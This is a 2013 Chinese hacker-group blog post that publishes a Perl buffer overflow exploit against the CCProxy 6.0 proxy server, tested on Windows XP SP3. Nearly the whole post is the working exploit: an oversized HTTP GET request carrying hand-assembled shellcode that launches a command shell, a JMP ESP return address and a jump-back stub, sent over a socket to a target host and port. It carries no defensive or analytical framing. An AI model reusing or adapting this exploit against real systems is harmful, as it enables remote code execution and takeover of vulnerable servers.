注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

[溢出]Perl ccproxy 6.0 Overflow exploit by k8team  

2013-10-20 11:20:52|  分类: 缓冲区溢出 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
#!/usr/bin/perl
# Perl ccproxy 6.0 Overflow exploit by k8team
# Dwimperl perl-5.14.2.1-v7-32bit.exe
# Date: 20131016
# Tested on: XPSP3

if (scalar(@ARGV) != 2) { "Usage $0 host port\n"; exit; }
use IO::Socket::INET;

my $JMPESP = "\x12\x45\xFA\x7F";
my $JMPback = "\xb9\x41\x41\x41\x25\xc1\xe9\x14\x2b\xe1\xff\xe4";

#shellcode cmd  XP SP3
my $shellcode =
"\x55\x8B\xEC\x33\xC0\x50\x50\x50" .
"\xC6\x45\xF4\x4D" .
"\xC6\x45\xF5\x53" .    
"\xC6\x45\xF6\x56" .    
"\xC6\x45\xF7\x43" .
"\xC6\x45\xF8\x52" .
"\xC6\x45\xF9\x54" .
"\xC6\x45\xFA\x2E" .
"\xC6\x45\xFB\x44" .
"\xC6\x45\xFC\x4C" .
"\xC6\x45\xFD\x4C" .
"\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2" .
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D" .
"\x89\x45\xF4\xB8\x61\x6E\x64\x2E" .    
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22" .
"\x89\x45\xFC\x33\xD2\x88\x55\xFF" .
"\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";


#my $poc = "GET /" . "\x41" x 4056 . " HTTP/1.0\x0D\x0A\x0D\x0A";    
my $a = "\x41" x (4051  - length($shellcode)); # +3 \xBF\x77\xFF\xD0

my $payload = "GET /" . $a . $shellcode . $JMPESP . $JMPback . " HTTP/1.0\x0D\x0A\x0D\x0A";

my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable toconnect!\n";

#print $payload;

sleep 1;
#print $sock $poc;
print $sock $payload;
print "Exploiting\n";
sleep 2;
print "Done\n";
  评论这张
 
阅读(590)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016